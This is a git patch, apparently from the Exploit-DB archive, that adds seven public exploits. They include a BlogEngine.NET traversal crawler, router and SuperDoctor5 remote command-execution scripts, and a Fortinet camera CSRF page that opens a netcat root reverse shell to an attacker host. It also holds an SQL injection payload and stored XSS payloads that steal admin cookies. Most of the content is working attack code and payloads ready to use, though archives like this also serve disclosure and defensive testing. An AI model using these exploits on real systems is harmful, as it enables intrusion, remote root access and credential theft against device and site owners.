From a90736625a7147d2721572bd2cca183631aeb942 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 26 Jun 2019 05:01:53 +0000
Subject: [PATCH] DB: 2019-06-26

7 changes to exploits/shellcodes

SuperDoctor5 - 'NRPE' Remote Code Execution
SAPIDO RB-1732 - Remote Command Execution
Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution
AZADMIN CMS 1.0 - SQL Injection
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting
---
 exploits/aspx/webapps/47035.py       | 183 +++++++++++++++++++++++++++
 exploits/hardware/remote/47031.py    |  22 ++++
 exploits/hardware/webapps/47033.html |  60 +++++++++
 exploits/multiple/remote/47030.py    | 145 +++++++++++++++++++++
 exploits/php/webapps/47034.txt       |  35 +++++
 exploits/php/webapps/47036.txt       |  33 +++++
 exploits/php/webapps/47037.txt       |  26 ++++
 files_exploits.csv                   |   7 +
 8 files changed, 511 insertions(+)
 create mode 100755 exploits/aspx/webapps/47035.py
 create mode 100755 exploits/hardware/remote/47031.py
 create mode 100644 exploits/hardware/webapps/47033.html
 create mode 100755 exploits/multiple/remote/47030.py
 create mode 100644 exploits/php/webapps/47034.txt
 create mode 100644 exploits/php/webapps/47036.txt
 create mode 100644 exploits/php/webapps/47037.txt

diff --git a/exploits/aspx/webapps/47035.py b/exploits/aspx/webapps/47035.py
new file mode 100755
index 000000000..76a1303fb
--- /dev/null
+++ b/exploits/aspx/webapps/47035.py
@@ -0,0 +1,183 @@
+# Exploit Title: Directory Traversal on BlogEngine.NET
+# Date: 24 Jun 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10717
+
+1. Description
+==============
+
+BlogEngine.NET is vulnerable to a directory traversal.  The page parameter, passed to /api/filemanager, reveals the contents of the directory.
+
+2. Proof of Concept
+=============
+
+Log in to the application and submit a GET request to /api/filemanager:
+
+Request:
+
+~~~
+GET /api/filemanager?path=/../../ HTTP/1.1
+Host: $RHOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: $COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+~~~
+
+Depending on how the request is submitted, the response may be XML or JSON
+
+XML Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/xml; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 01:58:46 GMT
+Connection: close
+Content-Length: 13030
+
+<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
+<FileInstance>
+    <Created>5/14/2019 6:58:46 PM</Created>
+    <FileSize></FileSize>
+    <FileType>Directory</FileType>
+    <FullPath>~/App_Data/files/../..</FullPath>
+    <IsChecked>false</IsChecked>
+    <Name>...</Name>
+    <SortOrder>0</SortOrder>
+</FileInstance>
+...
+~~~
+
+JSON Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/json; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 02:35:13 GMT
+Connection: close
+Content-Length: 10011
+
+[
+    {
+        "IsChecked":false,
+        "SortOrder":0,
+        "Created":"5/14/2019 7:35:13 PM",
+        "Name":"...",
+        "FileSize":"",
+        "FileType":0,
+        "FullPath":"~/App_Data/files/../..",
+        "ImgPlaceholder":""
+    }
+...
+~~~
+
+import argparse
+import json
+import os
+import re
+import requests
+import sys
+
+"""
+Exploit for CVE-2019-10717
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Outputs list of filenames found in web root
+
+python exploit.py -t $RHOST
+
+?path=/../..
+/../../archive.aspx
+/../../archive.aspx.cs
+/../../archive.aspx.designer.cs
+/../../BlogEngine.NET.csproj
+/../../BlogEngine.NET.csproj.user
+/../../contact.aspx
+/../../contact.aspx.cs
+/../../contact.aspx.designer.cs
+"""
+
+urls = {
+        "login": "/Account/login.aspx",
+        "traversal": "/api/filemanager"
+       }
+
+def make_request(session, method, target, data={}):
+    proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+              }
+    if method == 'GET':
+        r = requests.Request(method, target, params=data)
+    elif method == 'POST':
+        r = requests.Request(method, target, data=data)
+    prep = session.prepare_request(r)
+    resp = session.send(prep, verify=False, proxies=proxies)
+    return resp.text
+
+def login(session, host, user, passwd):
+    resp = make_request(session, 'GET', host+urls.get('login'))
+    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
+    login_data = dict([(i[0],i[2]) for i in login_form])
+    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
+    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
+    resp = make_request(session, 'POST', host+urls.get('login'), login_data)
+
+def parse(body, path, outfile):
+    paths = json.loads(body)
+    new_paths = set()
+    for i in paths:
+        if i.get('FileType') == 0:
+            new_paths.add(i.get('FullPath'))
+        else:
+            outfile.write("{path}\n".format(path=i.get('FullPath')))
+    return new_paths
+
+def traverse(session, host, paths, outfile, visited=set()):
+    paths = set(paths) - visited
+    for path in paths:
+        print path
+        outfile.write("\n?path={path}\n".format(path=path))
+        visited.add(path)
+        resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
+        new_paths = parse(resp, path, outfile)
+        if new_paths:
+            traverse(session, host, new_paths, outfile, visited)
+
+def main(host, user, passwd, root, outfile):
+    with requests.Session() as s:
+        login(s, host, user, passwd)
+        traverse(s, host, root, outfile)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
+    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
+    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
+    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
+    parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
+    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
+    parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
+    args = parser.parse_args()
+
+    protocol = "https://" if args.ssl else "http://"
+    if isinstance(args.root, str):
+        args.root = [args.root]
+    main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)
\ No newline at end of file
diff --git a/exploits/hardware/remote/47031.py b/exploits/hardware/remote/47031.py
new file mode 100755
index 000000000..34e7f2999
--- /dev/null
+++ b/exploits/hardware/remote/47031.py
@@ -0,0 +1,22 @@
+# Exploit Title: SAPIDO RB-1732 command line execution
+# Date: 2019-6-24
+# Exploit Author: k1nm3n.aotoi
+# Vendor Homepage: http://www.sapido.com.tw/
+# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
+# Version: RB-1732 V2.0.43 
+# Tested on: linux
+
+ 
+import requests
+import sys
+ 
+def test_httpcommand(ip, command):
+   my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
+   r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
+   content = r.text
+   content = content[
+     content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
+     content.rfind('</textarea>')]
+   return content
+ 
+print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47033.html b/exploits/hardware/webapps/47033.html
new file mode 100644
index 000000000..5b36854f5
--- /dev/null
+++ b/exploits/hardware/webapps/47033.html
@@ -0,0 +1,60 @@
+# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
+# Date: 2019-06-19
+# Exploit Author: @XORcat
+# Vendor Homepage: https://fortinet.com/
+# Software Link: Customer Account Required
+# Version: v1.2.0.0
+# Tested on: Linux
+# CVE : TBA
+
+<html>
+    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 
+
+Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
+
+Follow the following steps to demonstrate this PoC:
+
+1. Replace IP addresses in Javascript code to repr	esent your testing
+   environment.
+2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
+   1337`
+3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
+   * Note: all modern browsers will cache Basic Authentication
+     credentials (such as those used by the FCM-MB40) even if the
+     FCM-MB40's administration page is closed.
+4. Open the crafted HTML document using the "admin" user's
+browser. 
+   * Note: In an attack scenario, this step would be performed by
+     implanting the code into a legitimate webpage that the "admin"
+     user visits, or by tricking the "admin" user into opening a page
+     which includes the code.
+5. Note that the `netcat` listener established in step 2. has received
+   a connection from the camera, and that it is presenting a `/bin/sh`
+   session as root.
+   * Note: type `id` in the `netcat` connection to verify this.
+
+_Note: After this issue has been exploited, the state of the system will
+have changed, and future exploitation attempts may require
+modification._
+-->
+    <head>
+        <script>
+const sleep = (milliseconds) => {
+    return new Promise(resolve => setTimeout(resolve, milliseconds))
+};
+var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
+var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
+
+var sed_img = document.createElement("img");
+sed_img.src = sed_url;
+
+sleep(400).then(() => {
+    var execute_img = document.createElement("img");
+    execute_img.src = execute_url;
+});
+        </script>
+    </head>
+    <body>
+        <h1>Welcome to my non-malicious website.</h1>
+    </body>
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/remote/47030.py b/exploits/multiple/remote/47030.py
new file mode 100755
index 000000000..4702913a9
--- /dev/null
+++ b/exploits/multiple/remote/47030.py
@@ -0,0 +1,145 @@
+# SuperMicro implemented a Remote Command Execution plugin in their implementation of 
+# NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'.
+# This is an intended feature but leaves the system open (by default) to unauthenticated
+# remote command execution by abusing the 'executable' plugin with an NRPE client.
+# 
+# For your pleasure, here is a PoC Python NRPE Client that will connect, execute the 
+# cmd of choice and return its output.
+#
+# To mitigate this vulnerbility, edit your agent.cfg to specificy which IPs are allowed 
+# to execute NRPE commands agaist the system and/or block traffic on port 5666.
+#
+# NRPE cannot be disabled in this software, see Guide section 3.2
+
+
+#Author: Simon Gurney 
+#Date: 23/05/2019
+#Vendor: SuperMicro
+#Product: SuperMicro Super Doctor 5
+#Version: 5
+#Guide: ftp://supermicro.com/ISO_Extracted/CDR-C9_V1.00_for_Intel_C9_platform/SuperDoctor_V/Linux/SuperDoctor5_UserGuide.pdf
+
+
+
+### Configurables
+
+command = "ping 1.1.1.1 -n 1"
+target = "1.2.3.4"
+target_port = 5666
+
+### Don't need to change anything below
+
+import binascii
+import struct
+import socket
+import ssl
+
+#### Struct Encoding Types
+StructCodeInt16 = "!h" ## Unsigned Int16
+StructCodeInt32 = "!L" ## Unsigned Int32
+
+#### NRPE Specific definitions
+NRPE_Version = ("","One", "Two", "Three")
+NRPE_Packet_Type = ("", "Query", "Response")
+NRPE_Response = ("Ok", "Warning", "Critical", "Unknown")
+NRPE_Version_1 = 1
+NRPE_Version_2 = 2
+NRPE_Version_3 = 3
+NRPE_Packet_Type_Query = 1
+NRPE_Packet_Type_Response = 2
+NRPE_Response_Ok = 0
+NRPE_Response_Warning = 1
+NRPE_Response_Critical = 2
+NRPE_Response_Unknown = 3
+NRPE_Response_Type_Query = 3
+
+#### RandomDefintions
+NullByte = b"\x00"
+TwoCharSuffix = "SG"
+
+class NRPEpacket:
+	port = 5666
+	server = "127.0.0.1"
+	nrpeVersion = NRPE_Version_2
+	nrpePacketType = NRPE_Packet_Type_Query
+	nrpeResponseCode = NRPE_Response_Type_Query
+	ownSocket = None
+	def CalculateCRC(self):
+		tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion)
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType)
+		tempBuffer += NullByte * 4
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode)
+		tempBuffer += self.content
+		return (struct.pack(StructCodeInt32, binascii.crc32(tempBuffer) & 0xffffffff))
+	def PadTo1024Bytes(self,command):
+		if len(command) <= 1024:
+			tempBuffer = command
+		else:
+			Error("Command string is too long!")
+		while len(tempBuffer) < 1024:
+			tempBuffer += "\x00"
+		tempBuffer += TwoCharSuffix
+		return tempBuffer.encode()
+	def Connect(self):
+		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		self.socket.connect((self.server,self.port))
+	def WrapSSL(self):
+		self.socket = ssl.wrap_socket(self.socket,cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23, ciphers="ALL")
+	def Send(self):
+		tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion)
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType)
+		tempBuffer += self.crc
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode)
+		tempBuffer += self.content
+		self.socket.send(tempBuffer)
+	def Recv(self):
+		tempBuffer = self.socket.recv(2048)
+		self.nrpeVersion = struct.unpack(StructCodeInt16,tempBuffer[0:2])[0]
+		self.nrpePacketType = struct.unpack(StructCodeInt16,tempBuffer[2:4])[0]
+		self.crc = tempBuffer[4:8]
+		self.nrpeResponseCode = struct.unpack(StructCodeInt16,tempBuffer[8:10])[0]
+		self.content = tempBuffer[10:]
+		if self.crc != self.CalculateCRC():
+			print ("CRC does not match!")
+	def PrintOut(self):
+		print(" -=-=-=-= Begin NRPE Content =-=-=-=-")
+		print("| NRPE Version       =  %i  -  %s" % (self.nrpeVersion,NRPE_Version[self.nrpeVersion]))
+		print("| NRPE Packet Type   =  %i  -  %s" % (self.nrpePacketType,NRPE_Packet_Type[self.nrpePacketType]))
+		print("| NRPE Packet CRC    =  %i" % struct.unpack(StructCodeInt32,self.crc)[0])
+		print("| NRPE Response Code =  %i  -  %s" % (self.nrpeResponseCode,NRPE_Response[self.nrpeResponseCode]))
+		print("| Packet Content:")
+		print("| %s" % self.content.decode().strip(TwoCharSuffix).strip("\x00"))
+		print(" -=-=-=-= End NRPE Content =-=-=-=-")
+	def Close(self):
+		if not self.ownSocket:
+			self.socket.close()
+	def AutoSend(self):
+		print("Sending...")
+		self.PrintOut()
+		self.Send()
+		print("Receiving...")
+		self.Recv()
+		self.PrintOut()
+		self.Close()
+	def __init__(self, command, socket=None, server=None, port = None, ssl=True):
+		self.content = self.PadTo1024Bytes(command)
+		self.crc = self.CalculateCRC()
+		if server:
+			self.server = server
+		if port:
+			self.port = port
+		if not socket:
+			self.Connect()
+		else:
+			self.socket = socket
+			self.ownSocket = True
+		if ssl == True:
+			self.WrapSSL()
+
+			
+#NRPE CMD format is "executable!<binary>!<arguments> i.e."
+#NRPEpacket("executable!ping!1.1.1.1 -n 1", server="1.2.3.4").AutoSend()
+
+split = command.split(" ",1)
+cmd = "executable!" + split[0] + "!" + split[1]
+NRPEpacket(cmd, server=target, port=target_port).AutoSend()
\ No newline at end of file
diff --git a/exploits/php/webapps/47034.txt b/exploits/php/webapps/47034.txt
new file mode 100644
index 000000000..a7f543b7d
--- /dev/null
+++ b/exploits/php/webapps/47034.txt
@@ -0,0 +1,35 @@
+[+] Sql Injection on AZADMIN CMS of HIDEA v1.0
+
+[+] Date: 24/06/2019
+
+[+] CWE Number : CWE-89
+
+[+] Risk: High
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://www.hidea.com/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Linux
+
+[+] Vulnerable Files: news_det.php
+
+[+] Dork : inurl:"news_det.php?cod=" HIDEA
+
+[+] Exploit : https://www.site.com/news_det.php?cod=[SQL Injection] 
+
+[+] Payload : /*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+
+[+] PoC:
+         http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+    
+        https://site.com/news_det.php?cod=77/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+
+[+] Example:
+
+       curl 'http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-' -H 'Host: www.centroconcept.com.br' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3' --compressed -H 'Cookie: PHPSESSID=dv0rd3b6rbghah80getonfp601' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1'
+
+		XPATH syntax error: '
+		s3x0u:centroco_ger:s3x0u'
\ No newline at end of file
diff --git a/exploits/php/webapps/47036.txt b/exploits/php/webapps/47036.txt
new file mode 100644
index 000000000..bd740135b
--- /dev/null
+++ b/exploits/php/webapps/47036.txt
@@ -0,0 +1,33 @@
+# Exploit Title: iLive - Intelligent WordPress Live Chat Support
+Plugin v1.0.4 Stored XSS Injection
+# Google Dork: -
+# Date: 2019/06/25
+# Exploit Author: m0ze
+# Vendor Homepage: http://www.ilive.wpapplab.com/
+# Software Link:
+https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563
+http://www.ilive.wpapplab.com/
+# Version: 1.0.4
+# Tested on: Windows 10 / Parrot OS
+# CVE : -
+
+Info:
+
+Weak security measures like bad textarea data filtering has been
+discovered in the «iLive - Intelligent WordPress Live Chat Support
+Plugin». Current version of this premium WordPress plugin is 1.0.4.
+
+
+
+PoC:
+Go to the demo website http://www.site.com/ and open chat window by clicking on «Chat» icon on the bottom right corner. 
+Use your payload inside input field and press [Enter]. 
+Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
+To check your XSS Injections log in http://www.site.com/wp-admin/ and go to this page http://www.site.com/wp-admin/admin.php?page=ilive-chat-page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat).
+
+Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
+Example #2: <img src=https://i.imgur.com/zRm8R9z.gif
+onload=alert(document.cookie);>
+Example #3: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
+Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
+Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
\ No newline at end of file
diff --git a/exploits/php/webapps/47037.txt b/exploits/php/webapps/47037.txt
new file mode 100644
index 000000000..c110d6d72
--- /dev/null
+++ b/exploits/php/webapps/47037.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection
+# Google Dork: inurl:"wp-content/plugins/screets-lcx"
+# Date: 2019/06/25
+# Exploit Author: m0ze
+# Vendor Homepage: https://screets.com/
+# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877
+# Version: 2.8.3
+# Tested on: Windows 10 / Parrot OS
+# CVE : -
+
+
+Info:
+
+Weak security measures like bad input field data filtering has been
+discovered in the «Live Chat Unlimited». Current version of this
+premium WordPress plugin is 2.8.3.
+
+
+
+PoC:
+
+Go to the demo website https://site.com/try/lcx/night-bird/ and open chat window by clicking on «Open/close» link, then click on «Online mode» to go online. Use your payload inside input field and press [Enter]. 
+Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other
+website.
+Example #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">m0ze
+Example #2: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">m0ze
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 618be972a..a44941168 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17511,6 +17511,8 @@ id,file,description,date,author,type,platform,port
 46999,exploits/php/remote/46999.rb,"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)",2019-06-17,AkkuS,remote,php,
 47016,exploits/linux/remote/47016.rb,"Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)",2019-06-20,Metasploit,remote,linux,
 47019,exploits/windows/remote/47019.txt,"EA Origin < 10.5.38 - Remote Code Execution",2019-06-21,"Dominik Penner",remote,windows,
+47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
+47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41429,3 +41431,8 @@ id,file,description,date,author,type,platform,port
 47024,exploits/php/webapps/47024.txt,"SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
 47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
 47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
+47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,